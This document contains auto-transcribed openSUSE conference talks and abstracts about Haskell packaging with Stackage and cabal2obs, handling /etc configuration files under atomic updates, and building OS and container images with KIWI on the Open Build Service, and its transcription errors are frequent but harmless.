42.3, you're also going to have the latest version of everything. In Leap 42.2, you don't have that right now. You have an older compiler and an older package set, which is still fine for most purposes, but it's not the bleeding edge because we stop updating that at a certain point so that we don't break our user's applications that they may have written. Then for installing libraries that you want to work with, there is a central repository called Hackage and people who write libraries that you can reuse typically register them on Hackage. So you have this large database of things that you can browse. And for every package that is on there, you can typically try ghc-name of that package, DevDev and install that, and there is a really big chance that it will just work. So in OpenSUSE, we distribute a subset of Hackage, which is called Stackage. That's a variant. It's called StableHackage. So we don't distribute everything that's up there, but we distribute a subset that fulfills certain requirements like it's regression tested regularly. There is an address where you can report errors too, and they are actually fixed in some reasonable time frame. So the author maintains the package well, and there is certain quality insurance mechanisms in place. And I think Stackage covers today about 2,200 packages, which is, I don't know, maybe a fifth of Hackage or so. But the most interesting libraries are in there. And we have all of them in Tumbleweed. And I think we have almost all of them in Open, in LEAP as well. And last but not least, there are tools written in Haskell, which are no development library, and you can install those like any other tool. For instance, Pandoc is an extremely nice utility to convert text formats from one format to another. And the Haskell compiler, of course, and all of this is available via Zippo. So now suppose you are on an older distribution, or you are on the commercial branch of SUSE Linux, and you don't have those packages right away available, or you have them available in a version that doesn't suit your needs. Then what you can always do, you can register any of those development projects, which exist on OBS. The command is a bit un-veiled, but I think, yeah, you can figure it out if you want to. So basically what happens is that this LTS package set, it gets created at a certain point, it gets a version number like LTS6, and then the updates of new packages go in only if they don't break the API. So if there is a bug fix update, it will be updated in that package set. But if there is an update that breaks the API, it will not get into that package set. And then every year or so there is a new LTS version where they say, okay, latest of everything, and then we start the whole process over. So within that package set, you have a stable development environment, and then you have different versions that use different major versions of the Haskell packages. And you can basically choose between any of those. So the latest one is currently LTS version 8. That's the one that we distribute here in this project, which is the development project for factory. And so when you say you're on LEAP 42.2 and you want the latest Haskell versions, the latest Haskell compiler, then you can just add that repository to your ZIPA installation and it will work fine. Then suppose you've written a nice application in Haskell, a web application, say, and you want to deploy that on a whole bunch of machines and actually use it to provide services on the Internet. Then this is a problem that the Haskell community has traditionally struggled with, and this is where I can just invite every Haskell hacker who wants to do that, give OpenSUSE a try because here it's actually very simple. The first thing that you can do, say you have written your application and you want to deploy it. The second way you can do that is just upload it to Hackage, get it registered into Stackage and then it takes a week or so and then we'll have it and we'll distribute it for you. So once you publish your code and you release it as free software, then OpenSUSE, a tumbleweed is automatically going to pick it up, and that means you can install it everywhere. Now maybe that's not suitable for you for some reason. Maybe, I don't know, the code is not open source or maybe tumbleweed is not for you. And you can always use the build service, which is also for everyone who doesn't know that, this is maybe the most useful service at all in all of OpenSUSE. You can get an account here for free, you can upload spec files for your packages and this thing will build them and will test them for you and it will distribute binaries for you and you can just use them wherever you want. The spec files that you do, you don't have to write them manually, you can generate them automatically for your Haskell projects, there's a tool called Cabal RPM, which is part of OpenSUSE of course, and you can feed a cabal file through that and you get a spec file out of it that you can register here and build your own application on the open build service and then you can install it everywhere. And last but not least, if you have a crazy complicated infrastructure that depends on very specific versions of very specific packages and this is all a lot of work, then you can use the tool that we use to build those development projects, which is called Cabal to OBS. It's open source, it's on GitHub, you can fork it, you can change, edit the package set, run it and then upload your own package set to the open build service and build very specialized environments that are particularly well suited for your needs. So in Haskell, builds are described by something called Cabal, there is a very clever abbreviation like common architecture for building things I don't remember. And this is basically a plain text file, which contains some meta information about your package, like what it's called, what's the version, what's the license, a short description, a synopsis, all these things that every package basically has. And then you also have, for instance, a library, an executable component in your package and these can depend on other Haskell packages like here and then they have this extra library stand so they can depend on system libraries. In this example, for instance, the package depends on open SSL and wants Zippert to install that for you for your build. Here you have an executable, which depends on Pandoc and example on the library. And so this is something, if you're developing Haskell package, this is a file you are going to write, this is something you'll probably do. And once you have that, you can generate a spec file from that automatically. And obviously this is the process that we also use when we, this project with those 2000 builds in there, we updated automatically from those Cabal files. We download the Cabal files from Hackage with a tool which is essentially a build system, right? It's written in Haskell. So we basically get the latest version of everything and then we rebuild the repository and the process, I'm going to show it in more detail on the next slide, but the process basically creates the spec file. And we have, in this case, this update only shows an update for Pandoc for LTS8, but obviously we update all kinds of packages and all kinds of package sets. This is just one example to make it fit on the slide. So suppose that version has an update and we generate the spec file for it, we run spec cleaner over it, we basically run spec cleaner over everything. So we want our spec files to have a very consistent, consistent look and then we want spec cleaner to be a no op when you run it on it. And then for some packages, the Cabal file maybe doesn't contain sufficient information or maybe we have additional features we'd like to enable and then we have a set of patches that may be applied to every of those packages to patch the spec file into, I don't know, add additional features or fix the license tag, like in this case. And again, after every patch, we always run spec cleaner and in the end it says done, took seven seconds and now we have this LTS8 package set. And this is essentially a checkout from OBS, which we then commit and that's that. So this whole update process, I guess the point is the whole update process is automatic. There is no human, I mean sometimes something breaks because of a bug somewhere, but for the most part this is completely automatic. So this package set is always in an up to date state and nobody's actually manually doing anything about it, which is particularly nice. So when we generate the package set, we have this Cabal to every S utility, which also implements a lot of checks, which we learned over time are fairly important. So for instance, sometimes people specify a name of a license that doesn't exist and we know that's going to fail the review. So if we detect anything like that, we abort the build immediately. Then people write all kinds of nonsense into their package descriptions. Oftentimes it's something like see read me, which doesn't help us much. Sometimes it's just plain nonsense or it's something they copy pasted from the wrong package. And we make a good effort to detect these cases where these things don't add up and also abort the build so that we can fix it manually. And also what something people often do in Cabal files is that they confuse documentation and data files that they say, I have a read me and it's a data file, but no, it's a read me, it's documentation. And then we try to automatically fix that in the spec file so that our users have a find the read me in the proper location. Okay. So we generate the whole package said this is completely automatic. Then we committed into this double project into the LTS 8 project, which is a bit of a staging area. For the most part, things just compiled. Sometimes there is a build error for some reason, then we manually fix the build errors. And then when this development project is in a state where everything compiles, then we synchronize it into the proper development project for open source factory. And once it's in that project, it's going to submit, it's going to be submitted to factory mostly automatically. There is this OBS auto submitter, a nice service that the OBS team runs and it will automatically pick up the updates and submit them to factory. And then they show up and tumble with a couple of days later. So this whole stuff is all living on GitHub. The URL is on the next slide, I think. So you can mess with that. You can take a look at it if you want to. And the repository that we have contains obviously the package sets, the lists of packages and versions that we distribute. We have a bunch of packages that are not part of Stackash, but that we distribute anyway because they are useful for some reason. We have in some cases explicit build settings where we change the falls because we enable features that are not on by default or something like that. And then we have a set whole bunch of patches that improve the generated spec files. And I counted those things yesterday and I was very surprised that we have actually well over 230 packages that declare their license incorrectly. And this is, I think, the single most reason for failed reviews when we submit those things. So people, they say in their cabal file, I have a BSD2 license and then they have a BSD3 license file in there. Or some people say, I'm GPL and in fact, they are MIT license. And this is all very common. I don't know how people do that, but it's very common. So people have no idea what license their package is under. And then we fix it for them. This is, I have to say, one of the things that is really nice about OpenSUSE because when you download this stuff from us, then you can actually trust the license. So when the spec file says this is a BSD2 package, then it is a BSD2 package. But if you download it from Hackage, then it might not be. But in OpenSUSE, you have had a lawyer actually look at it and make sure that this information is accurate. So this is, I think, quite a nice added value. We have lots of fixes for package descriptions that didn't make any sense. Sometimes people upload release tar balls where files are missing. And we add them for them again and all kinds of things. I mean, distributing software is not as easy as it looks. OK. So if you want to know more, then these are the places to look at. Obviously, the Haskell website has the complete standard for the language. It has links to tutorials and everything. Stackage is the place to look for the stable package sets. If you want to mess with that. This is the repository for our software that we use to develop everything. And this is the development project and OBS. OK. I think it was fairly quick. So thank you very much for your attention. And if you have any questions, then shoot. Is there any plan to make Haskell available on ARM in open SUSE? It is not available for ARM V7 for the 32-bit port. Or at least I didn't find any. So the development project here. Well, maybe I can help out here. I'm Peter Trommner. I'm the maintainer of the compiler. So I'm actually responsible for initiating the 2000 packages attack, if you want to call it that. Currently we haven't installed the 32-bit binaries for GHC, for ARMs. Personally I don't know if I find the time to do it. But others have submitted a bootstrapping compiler. That's what we're missing in the past. And I mean, we could try. I don't know. I think we need a certain version of LLVM for the ARM ports to work. And the right version of LLVM is not available in the last LEAP version. Or 8.2 GHC version that's going to come out in June, I think. Well, that's the plan of GHC headquarters. They said they're going to support LLVM 39 or maybe even 40. We have both of those in factory or in tumbleweed. And I could give it a shot if I find the time. Or if somebody else wants to jump on it. And just send pull requests to develop languages Haskell. And I'll look at it and enable it if I can. But be a bit patient with the 8.2. It's not my main job. My students would get very angry if I said, well, I'm not preparing the lectures because I have to do the Haskell compiler. Thanks. I've got another question. So I'm from a university where we are working with tools regarding for application field of data mining. Is there something like tools like NumPy and SciPy available? I know, sorry, it's a problem question. But are there tools like NumPy and SciPy like Pandas for reading in data and processing it? Does anyone here in the audience also knows of that? Because that would be quite cool to apply. There is a special interest group in Haskell community that's concerned with data mining, machine learning, and they have produced a whole set of libraries. There is something, a very comprehensive binding to R, which allows you to mix R and Haskell. So you can write Haskell code and seamlessly interface to R and share results, which I think is probably a very good solution because R has the most sophisticated libraries in this area. And you have explicit machine learning libraries and visualization libraries that are written in Haskell. So I don't know, I'm not an expert in this field, so I don't know whether the stuff is as good as the Python libraries are, but there certainly is a sophisticated infrastructure there. Yeah, and it's open source, right? Well, thank you very much.
The functional programming language "Haskell" has been instrumental in researching the design of compilers, type systems, and advanced programming language features for more than 2 decades, but in recent years it has also become increasingly popular with red-blooded software engineers who worry about practical tasks like developing client/server systems, standalone applications, cryptography, finance solutions, or REST application back-ends. As it happens, openSUSE offers outstanding support for the Haskell language ecosystem and is therefore an ideal platform for discerning Haskell hackers who develop commercial-grade solutions. Both Tumbleweed and Leap support a whopping 2,200 Haskell packages that cover the entire LTS Haskell standard version 8.x. Furthermore, there exists a sophisticated infrastructure to easily maintain and update a package set of that size, which guarantees that important new releases make it into the distribution with a minimal delay. In this presentation, we would like to describe the current state of Haskell packaging in openSUSE, covering the following topics in particular: 1. Introduce Haskell briefly and explain why it kicks ass. 2. How can I install and set up a Haskell development environment with openSUSE Leap or Tumbleweed? 3. How can I package and deploy my own Haskell applications on openSUSE with the Open Build Sevice? 4. How does the underlying infrastructure work ("cabal2obs") that makes all this possible? The target audience for this presentation are Haskell programmers who would like to get started using openSUSE, openSUSE users who would like get started with Haskell, and packagers who would like to get insights into an endeavor that maintains and updates several thousand spec files without major human intervention.
10.5446/54397 (DOI)
So, we have a lot of great talks about micro s, cubic and transaction updates the last days already. So, we had to do a lot of changes in the last three years to make this great product things from very small to very intrusive, very big, but the good thing is nobody noticed, some people only know, notice after two years the changes we made. So, what we did worked fine and helps the people, but there is one big issue topic left and this is our configuration files in case you are doing an atomic update and that's what I want to speak about today. So my name is Thorsten Kukuk, I am distinguished engineer at SUSE, I am also senior architect responsible for SLS and micro s. A little bit about the background, RPM configuration files. This is something for every distribution has and RPM as standard has some support for configuration files. If you don't mark your configuration file as package as special, then all the changes of the user will be overwritten with the next update. If you mark it as normal config file and you make a change to your configuration file in the package, then the one from the user will be moved away as RPM safe and overwritten. If you mark it as config normal place, then the modified configuration from the RPM is stored as RPM new beside of it. So this hasn't changed for many, many years. So the sounds to me at the beginning, first glance, everything must be okay as people would have changed it. But is it really everything okay? So after every update, you have to look for RPM safe and RPM new configuration files to get your services working again. And special thanks here for these people who continuously fix typos in comments in their configuration file, mark it as config. It means after every update with typo fixed in a comment, my configuration file is moved away and has the default one which is not working on my systems and have to go through all the RPM safe and RPM new files to find out what has changed again, why is my service not coming up. So then you have to manage all the changes manually. Luckily, most of the changes are not that important or really visible to the service. It's continued to working. But if you really didn't take care after every update, it could be that your service will be insecure, not work as expected or something similar. Now we introduce atomic updates for user with transaction update. Other solutions for it. And that's even getting more worse. So atomic updates are either my update is applied fully, correctly, or not at all. There is now stage in between like half of the RPM is currently updated, services are seeing it whatever. If everything applies fine and there are no mistakes, you make an atomic switch to the new system and everything is there and running. And if something fails, you can do an easy rollback to the old version. What does it mean for configuration files? So we create a copy of the current system and update this. This includes the configuration files, of course. And this also means during the hidden update, we merge or adjust the configuration files with the new verphins. Between this time and when the admin finally says now it's a good point to activate our changes and reboot, you can do your own changes to configuration files. Which means you have before reboot visible configuration files with changes and not visible, you have configuration files with changes done by us as Linux distributor or as package or upstream software package and they are going out of sync. This reboot now, all changes made by the admin to the visible one after applying the update are lost. So you have to manually find them and reduce them again. And other problems are how does the admin now, that's the verphins, that's the configuration changed in the background, how can he adjust them before the reboot. So we have a lot of open questions here. How to handle configuration files correctly in the case of an update. There's also something called factory set of system D. There was a block of about it. In the end it means I can delete ETC and with the next reboot everything will be recreated again and the system is in the state as I deployed it without any changes. Some people like this idea but now Linux distributor did implement it. Most likely because it's not really trackable, it's a lot of work, it's a lot of changes to packages, whatever. I don't know exactly why. So this all together leads me then to the problem we are having today, which means most Linux distributions have a Linux distribution with atomic updates. For example it's open to the micro s for us, it's core s, Fedora, Redhead, atomic or core s, it's open to core. So there are many and they all have faced the same problem, how to update the configuration files in ETC and they all did come up with their own solution. So which means it's different on every Linux distribution. Which reminds me a little bit of the times before we had the file hierarchies, where on every Linux distribution the configuration files, applications, everything was stored in another place and the file system layout was completely different. So now if you have a solution for a package for your distribution with atomic updates and if you speak to the upstream developers, they say it's working for the user standard Linux distribution desktop server and for atomic updates everybody is doing something else so I have to implement several ways every time for only one distribution so they are not interested in it. So that makes it also pretty hard to come up or solve the problem for our products. So and this is the goal I try to solve or what I have. My goal is that independent on which Linux distribution you are using with atomic updates, the user would always find the configuration file in the same place. As an example, most of the atomic updates have the user database not in the ITC, it's only the dummy or for the user, but something under user-based system or something else. I very often got told CoreS is much more secure than my coreS because coreS has only one user and that is root. Besides that I don't think that having only one account and everything is running as one account is really secure, it's not true too and I always follow them where in user-based system or base they can find the real pass with the file. So this is always surprising for the people, they know it from one distribution and the next is different and the next is again different. So users would find the configuration and everything in the same location or the same way that they know how to look for it. It should also create guidance for developers that they develop new software in a way that it works from the beginning with transactional update. For midterm I want to have a solution for atomic updates, for a small set of packages only like we use in open-susernocoreS. Long-term it would be good if we can do it for the whole distribution and not only for a few packages and that it is really consistent across. So what I don't want to take the fear of some people, I always hear in talks about this, it would not become a requirement for all packages and you would not start now to adjust all packages to follow to the new layout. If there is a package which has already a solution for this like system D, don't confuse people by moving everything around today, it's not helpful. If this is something people really like, it will come from alone, if not, then it doesn't really matter. And if you think about a solution, what are the requirements for it? The one I created in discussions with my team and other people are it needs to be visible to the admin that configuration files got updated and that you maybe need to look at it. It must also be visible for the admin which are his own changes, that he knows if he has to merge something what he changed. And in the best case, it would be a two-optimally if the changes would be merged automatically. Now I want to come to some proposals. We have different kind of configuration files that's why we need more than one proposal. We cannot do one for everything and not for every problem we found a good solution yet. But if you look at the standard application configuration files, there is a good solution, look at how it's system D is doing it. System D has user-lib system D with the system distributor defaults, just the ETC system D where you can override it, so you can copy the configuration file and adjust it from user-lib to ETC and then your version is done and you still have the unmodified original version in user-lib. Or if you only want to override one or two single values and if it's possible with the format of the configuration file, you can create a.D directory and put only a file or several files which will override a single option and not the whole file. This also helps you later to find out what did I change because if you have a long file with let's say 100 options, it's hard to find out which you changed. But if you have five files, every file one option, then you immediately see what you did change really there. Read the look at the system D unit manual page, there is a good example how this works like and how it could look like. So at the first glance, it looks like it's a lot of coding work. I have to attach every package, every software to implement it. That was my first impression when I started looking into these problems too. But if you take a closer look at open to the tumble with an ATC, you will find out it's not that much work, at least not for the core packages because most core packages have already something built in which is similar or also solves the problem, but we don't use it. For example, PEM, we have ATC PEMD, we have user-lib PEMD. Nobody knows about user-lib PEMD. I'm one of the old Linux main-tenors, completely forgot that this directory exists and only found out by accident when looking at another Linux system. So for PEM, we only need to adjust our packaging and we have it for more or less free. This CTL, we also have a lot of directories, user-libs, etc. So packages could install their config file in user-lib, not in ATC and the admin could overwrite our distributions between specific settings in ATC and always sees what he changes and always sees what our defaults are. LD config is also something similar. We use etc-ld-config.d. We install our, it's not configuration files in the meaning because now user will ever modify the files we install there. So in my opinion, they wouldn't be in etc if the admin never touched them, modified them or cannot even modify them. These are only some few examples. If you look at etc, you will find a lot of tools who have already.d directories and I didn't check everything. Maybe they have already support for several ones, but if not, it should be easy to enhance them to support it. So the first goal we should look at is what do our applications only support today to solve the update problem and enable it and adjust your packaging that we can do that. Another thing is there are for every language config files parsers, for Perl, Go, C, C++, Ruby, and very few but some of them already support the system D like setting two. For example, I found one written in Go, Goini. You also have somebody in my team currently working on a C implementation of a library that has only one config interface and then the library in the back end is merging all the configuration files for the application. So that also helps a lot to adjust applications in an easy way and is not really intrusive there. Another different case are this I call it system databases. This is not really strictly spoken or configuration files but every system has an ETC RPC, ETC services, ETC protocols. It's quite easy to move them to something on the user and we also have NSS plug-ins which could look up at first and ETC and if you don't find the entry there, look up in user if you find the entry there and if yes, use that. So that is really only a package thing thing. I used the pars user-fair defaults ETC there because this pars, this directory is already used by Tumbleweed or was used by packages before I started looking into this. I know from discussions already that some people don't like it, I continue to use it in my slides because it's already there and used but the directory is something we also still need to discuss. It's not optimal for example FEDA or pass-with-d entry is not system independent so don't belong to fair. There could be other configuration files which are system-dependent, they don't belong to fair so maybe user ETC would something better but more at the end. So ETC pars with the ETC group file, ETC shadow file, to be honest we didn't find a good solution yet. We made many proof of concepts. One was also ETC shadow.d directory, ETC group.d directory. It's quite easy with NSS plug-ins that all applications can read this merge in without any changes to the applications only to the ETC NSS switch configuration file but every time if you then think about changing a password, creating a new user, it's really a huge amount of work to adjust all possible tools there. So the best we currently have and if somebody has better ideas, I would be really happy to hear them. So create system accounts in user fair, defaults whatever, normal accounts done by the user created in ETC. This is a drawback. If the admin creates a system account, you can have again a UID clef because there could be already in the hidden file something, use NSS plug-in to read them. This does not really solve all problems. NSS compact still used by many people, wouldn't work anymore. And as I said with the example from Core S users, it's confusing if people don't see all passwords, all users in ETC anymore. They need to know where to look for the real one and how to look it up. Default locations, I already said below user, we need a way where to store configuration files that people will find them. Currently it's like pre-file system, here at East Tundra times everybody has something else. So it would be easy to find for user and remember for system administrators, best is all in one place. Don't clobber user lip even more. There are already so many files and directories in user lip that it's really hard to find something there anymore. Find a solution which does not conflict with the file system standard or we need to adjust it. I'm afraid we need to adjust it even if it is nearly dead, I hope that we can reactivate it come to a conclusion there. The name of the directories should not confuse administrators, so they should know what it is. And it should be clear that this is the default location for the solution supported, supplied configuration files and not that this is the configuration files where they have to edit the files. They still need to do it in ETC. As I said many Linux solutions have their own solution already. Here is a list of what different solutions use. User fare default is what clear Linux and several tumbled packages are already using. User fare base layout scale is what is used by Core as container Linux. Slash writeable is used by Core. User ETC is used by the micro as Rated and Fedora or CentOS atomic. User fare this config was a suggestion. My biggest problem here is the fare because what do we do if applications or people have something architecture specific that we cannot restore and share. User fare is already used but I think using that would be even confuse people more because the usage of what is used then and what is written in the file here is not really compatible. That were my current favourites when I wrote the slides. I am not that true anymore. I froze user defaults as top directory because it is already in use on the tumbled read. But we are thinking about password group, shadow that don't really fit it. The idea was to move it to user this image ETC but that is really hard to find for people and even more confused in different places. I think maybe user ETC would be the best choice as already used by Fedora, Rated and open SUSE micro as but this is really something needs to be discussed in the broader round. Now I am at the end. There is a long more detailed proposal in my GitHub directory. I will also put the slides in there. So there is written much more also background why some things are as they are or why things we tried already are not working. And are there now questions from you, suggestions, ideas? I am happy about every feedback. So what I take from your talk is primarily we need more modularity in configuration files. So the tools which need a great configuration files should already provide a way to provide some modularity. For my experience there is also the way to go. So just two remarks. When we talked about authentication databases, pass with the groups and so on, maybe the problem isn't that critical because usually if you distinguish system accounts from say user accounts in a bigger infrastructure, the user accounts are not provided usually from local databases but from a directory or whatever, for example using SSSD. So maybe this would be a way to circumvent those problems you have mentioned. Yes, it is also an idea to store them in Ada whatever. That is also a reason why currently we don't see it as critical to solve because really if you have more than one machine you normally either have very few accounts or a big network you have something like a DAB active directory or whatever for this. The problem is really if the admin creates a user system account for his software he need to install for it and then it is a clef. The following for it are not big, that is why currently we ignored it but this is something we would like to solve in a generic way for everybody. The second thing is I am not that sure but I am also not an expert in that area whether the existing PEM files really solve the problem of modularity in PEM. Have you some experience on that but maybe we could clarify this in a personal conversation. Yes and no. So they don't really solve it if you have user live PEM.D but there is also the include directive and with this is it possible to solve it. Yes, it is not easy for the admin but it is a first step. And I don't think that after I would say the PEM development is that many, many years because some who owns the protocol or the definition doesn't exist anymore and nobody is willing to come up with a PEM version 2 or whatever because they are SSSD whatever so that is too much in use to really replace it. I think we need to go small steps to make it easier. One is already that the admin can override it and still see what we are doing. But yes, it is as I said not everything is solved. This is still minor or major if you open but having a step doing the first step then the next one is much easier. And I think the last question then is for personal conversation. Have you ever found a way to set the default UMask in a modular way? I haven't but we can clarify this in personal conversation. I think it is a personal. Thank you. Have you also considered to change the way that password group and shadow are managed entirely? I mean replacing the complete thing in a way. So as I said we made several proof of concepts. There are ideas to store in a database and have a demon fetching it out of it. We are not really happy with all one. If somebody has a good idea doing something completely different it is also fine. But there are some things to remember. One thing is there are two interfaces which are one which is reading it. It is an SS interface of Glypsy. So everything for which you can provide a SS plug-in is fine to read it. The second thing is and it is a big issue we always see you need a lot of tools which modifies a password, which modifies an account, which makes changes to it. And we were looking to get accepted more easily by people is to find something that they don't feel they need to learn something completely and have to touch 100 package applications and write big parts of their code. So there are many options. There are many ideas. Nobody had the time to come up with a proof of concept which was really solving the issue and would be accepted by many people. If you have a good idea how to store it in another way which solves the problem, great. I'm really glad to, if you could tell it to us, if you can discuss it, I'm really open there and there is no go except you don't want to touch the current existing interfaces. More questions. Okay, so I will submit this the next day to the factory mailing list and hope to get there more ideas, comments that we can start to make changes. Only as feedback in this round, if you would say we start for open source, modifying all applications, configuration files, would you support it, would you help to move it, do you think it's a good idea to move it, modulate it or do you think now I will not touch my packages, I will not help. So would be in favor and help moving this forward in this packages or like the idea? Only one, two, okay, four. The majority, who doesn't care at all? Okay, less. The majority, you don't support it, you don't like it or nobody doesn't like it. So many people think need to think more about it. Then I want to thank you for coming so early and I hope to more long-term discussions on the factory mailing list. Thanks.
The great thing on atomic updates as used e.g. with transactional-update is, that your system is always in a defined state. But what happens with changes in /etc? With normal updates, changes are done immediately to /etc during the updates. With atomic updates, they are only visible with the next reboot. Which means, changes between update and reboot to /etc can create a conflict. There are several strategies by other distributions, like three-way-diff and patching, symlinks, ignoring the problem, etc. In this talk I will mention the biggest challenges we see, which solutions do exist, what are the advantages and what the disadvantages and which impact this will have on normal distributions like openSUSE Tumbleweed. This talk is to create awareness for the problem and as base for discussions, it will not provide a solution for every problem. It's targeting application developers and distribution developers, as this are the areas were changes would be necessary.
10.5446/54398 (DOI)
So, welcome back from lunch, everyone. I hope you found something to eat. And I'm not hungry anymore. I'm here to talk about how you can build images containing open Zuzer with open Zuzer. I'm Fabian Vogt. I'm working for Zuzer as release engineer, specializing in building OS images. And by images, I, of course, mean containers, images, stuff you find on Docker Hub, open Zuzer Leap, for instance, for various versions. And for Leap, Jews, live CDs, also for Tumbleweed. This is how such an image looks in OBS. You can see some files there and on the right side, you see some build switch luckily succeeded. That's how the behind the scenes stuff works. As you can already see, we're using the open build service, of course. It's not only used for packages, but also the port's images. So you probably used OBS for downloading RBMs, but it can also handle images for building images and pulling in dependencies of images and all of that stuff. It's a central tool to develop open Zuzer. So every distro you can find for open Zuzer is built on the open build service. It's a central tool for everything. And OBS uses, of course, a tool for building images. OBS doesn't do anything itself. It just calls other tools. And in this case, it's Kivi. Yes, that's the official Kivi logo. And I did not find it in a higher resolution. But if you did, yes, just send it to me. But I think it's not really worth it showing it bigger. It's literally a Kivi with some open Zuzer logos copy pasted onto it. It has integration into OBS. That's the OBS part, which you'll learn more about later. It can not only build images with open Zuzer. It can also build images Fedora, Ubuntu, all that stuff. The components of an image are various. In the end, we, of course, want to have some container images or bootable disk images, which, using Kivi, are actually not that different. Kivi, of course, produces those images from a configuration file, which is called image.kivi. You can also call it a different file name. But you have to make sure that it ends at.kivi. Otherwise, OBS does not know how to actually build your package. This Kivi file contains metadata about the image, stuff like what the file name should be called, whether it's bootable, which architecture should have which packages. And also the version number. OBS reads this Kivi file and knows then which packages it has to download from other projects, which are defined in the OBS project config. And then starts a build using those RPM packages it collected and calls Kivi. You can also supply a shell script, which is called in the then root of the image, which is just a shell script called using bash normally. And you can really do whatever you want in there. You can call system CTL. You can remove files, write files, also remove all files you installed, but that's probably a bad idea. And you can also add custom files using archives. In this case, it's just a single archive. Normally, you should avoid to add custom files in image builds, as we have RPMs for that. Works much better. A Kivi image destruction is a fairly complex XML file. And you can probably not read any of that text, but don't worry. The top part of the Kivi file contains, obviously, an XML header because it's an XML file. And then some mysterious magic comments, which tell OBS stuff it doesn't know otherwise, like Kivi profiles or for Docker containers, which repositories to use. Below the image meta-dentfer is defined, which means the name of the image, file name, the author of the image, and also profiles, which I'll get into more detail later if I have enough time. The next part is somewhat more image-specific. You have for containers, you can define labels there for other image types you define, which file system to use, for instance, but FSS. Or X, whether to use Grub in legacy mode, ify mode, or UEFI mode, whether to enable secure boot, or which but FSS volumes to use. It's also defining the version of the image which is part of the file name. And some miscellaneous stuff like, should you want to install a documentation of packages or not. But I'll get into more detail later on that as well. The last part is probably the most important part of the image because it defines the list of packages actually installed in the image. At the top, you also have to define which repositories to use. But as we are building on OBS, we don't have any URLs to define. We just tell it to use the repositories OBS has configured. And then we have the list of packages in various groups, like Bootstrap, which you normally shouldn't care about unless you do some weird stuff, and the list of packages in the image. The good thing is, you don't have to write such an XML file from scratch. And you also don't have to take care of the OBS project configuration for that. You can just go on build opens is a org, click on new image after you're logged in. And then you have this election like this, where you can select, I want an image based on juice for leap. I want to build an image using kivi as a source of code using kivi as a derived Docker container. I want to build a container using Docker file. For containers and other kinds of images, size is very important. For instance, for Docker images, it's usually around 40 megabytes, sometimes just below 50. But we really try to not exceed 50 megabytes. Because the base image is, of course, the base image. And if you make it bigger, everyone using any base image or derived image also has that much space on the hard drive lost. And if you use multiple derived images using different versions of the base containers, that is obviously even more severe if you have some megabytes wasted space in there. Also for ISO images like live CDs, those have a limit based on which flavor they are. The rescue CD has to obviously fit on a CD, so it cannot exceed 700 megabytes. And the other live media have a hard limit, which is artificial, of 1 gigabyte. We just cannot exceed that. The most important part of the image building process is the package selection. First, you have to be sure that you actually know the use case of the image. If you don't know what the image is used for, you can't actually do a reliable and useful package selection. If you aren't sure whether a package should be included or not, you should redefine your use case and look at it. Maybe you should build two images for two different use cases if they are too different. Is it working? Just good. It's also important to not break hard dependencies. It definitely causes breakage if you say, I want to install package A, but package A depends on package B, but I don't want B. That doesn't work. If there is actually a use case where you can install a package, but you ignore some of the hard dependencies, that's a sign that the dependency is actually wrong and should be replaced by a soft dependency like recommends. What makes this easier is if you use patterns, which you probably have heard of a bit in the previous talk about DNF. Then it looks like this instead of a 200 line list of packages. If you just say, yeah, I want this pattern in this profile and the other pattern in the other profile instead of actually listing 200 packages per KV file, that's just unmaintainable. And it also makes it easier to have a synchronized package selection between the DVD installation, which has no such defined package list, and the KV image files you have. Then you can just edit a pattern spec file and say, yes, I want this package A in all micro-s images, for instance. And then it's automatically also rebuilding the image with those packages. Yeah, I just mentioned soft dependencies. Those are actually something to look out for. Soft dependencies are expressed in RPM files using recommends and supplements. Technically, all the Zatchers and enhances count, but for KV files, they don't actually matter as they are not pulling in any packages. Normally, they just give hints to the solver if one branding is recommended, for instance, or required. And also, suggested, it uses the open-sousa flavor instead of the upstream flavor, for instance. The issue is that a huge amount of packages are recommended by some other packages somewhere. Too much to fit on a CD or DVD, which is quite of a mess. So we actually have tools which try to balance those recommended packages. And if you pull in, for instance, the X11 pattern, you also get the X11 optional pattern recommended, which then also has some recommends on it. And for instance, if you install just X11 and you want to have a basic IWM desktop, you end up with just. You don't really want that, especially not if you are as constrained like a CD and you just want to install a minimal desktop. They are definitely important, though, because some stuff just doesn't work right if recommends are ignored. We have some bug reports about that. Users install using the only-requires option. Sometimes, because they say, yeah, it saves two gigabytes of space, but yes, you also might actually lose a bootloader. That's not a good idea. We can't actually make the bootloader hard dependency for the minimal base pattern in this case, as you can definitely have images which do not need grub. You can use different bootloaders technically or just not have a bootloader at all if you have something else doing it. The other supplements example is the breeze for style package, which is only installed if you have breeze five style installed, which is required by a pattern, and libqtfo. If the supplements get ignored and you install a package using qtfo, you don't have the fitting style, and it just looks weird. Yeah, the question is what you can actually do with those dependencies and those issues. One option is to just ignore them. Just mention every package you actually need manually and disable a honoring of self-dependencies, which sometimes wake because patterns change, and other other recommends change, and yes, you would need to take care of that manually. And I heavily recommend using openqa for that stuff. The other option is, of course, to enable self-dependencies and take care of blacklisting those packages and explicitly telling kv to not include those. That can be also a mess and is pretty much hard to maintain, as when the build fails, you do a size-contraint violation, you have to find out which package to ignore. As recommended packages can dump, that's also recommend other packages. You have to find a place in the tree where you can basically just say, no, I don't want this package anymore, and then 10 other packages are also not installed anymore. This is the approach which live cities use, but none of the other images I'm aware of. So this should probably be ignored. The better approach is to have patterns, which pull in all the packages which are normally only pulled using self-dependencies. Another option is RPM exclude docs, which can also be a mess, as some packages don't actually take that into account that documentation files can be excluded, and some files in RPM files actually automatically marked as documentation, everything in user-shared documentation, user-shared doc. And so if a user says that he doesn't want to install documentation on his system, those files are just not there. And RPM doesn't even complain if you say, yes, verify that this package is installed. Yes, the file isn't there, and RPM doesn't help you. Sometimes configuration files are marked as doc by mistake, and that's quite a mess. To enable exclude docs, you also have to take, you have to call Kivi with a specific option, RPM exclude docs in the XML file, but you also have to take care of setting the option in the installed system. Otherwise, every package should then install and able to image, will then again pull in documentation. A different problem is that also license files were called, as were marked as documentation previously, and so many image files saying that documentation should not be installed, although didn't have any license files in them, which is, for most licenses, actually a violation, so those images can't really be distributed. This is mostly fixed in Tumbleweed and also mostly fixed in Leap, but for older versions, like Leap42 or Leap12, this wasn't really completely done, so you have to really check that every package you install has a license file on the image. Container images are special in the way that they don't normally have something to do with block devices. You don't have a file system, and kernel, you don't have to care about the booting, which also means you don't have to add an init system like system. Metadata is for containers much more important because containers are just global. If you say, I want to pull open through the Leap, you get Leap, and then you have a toggle with Leap inside, but you don't actually know which Leap. So we need to use labels to actually tag those images with. Yes, this contains Leap15.1, and yes, this got built in 2019. This 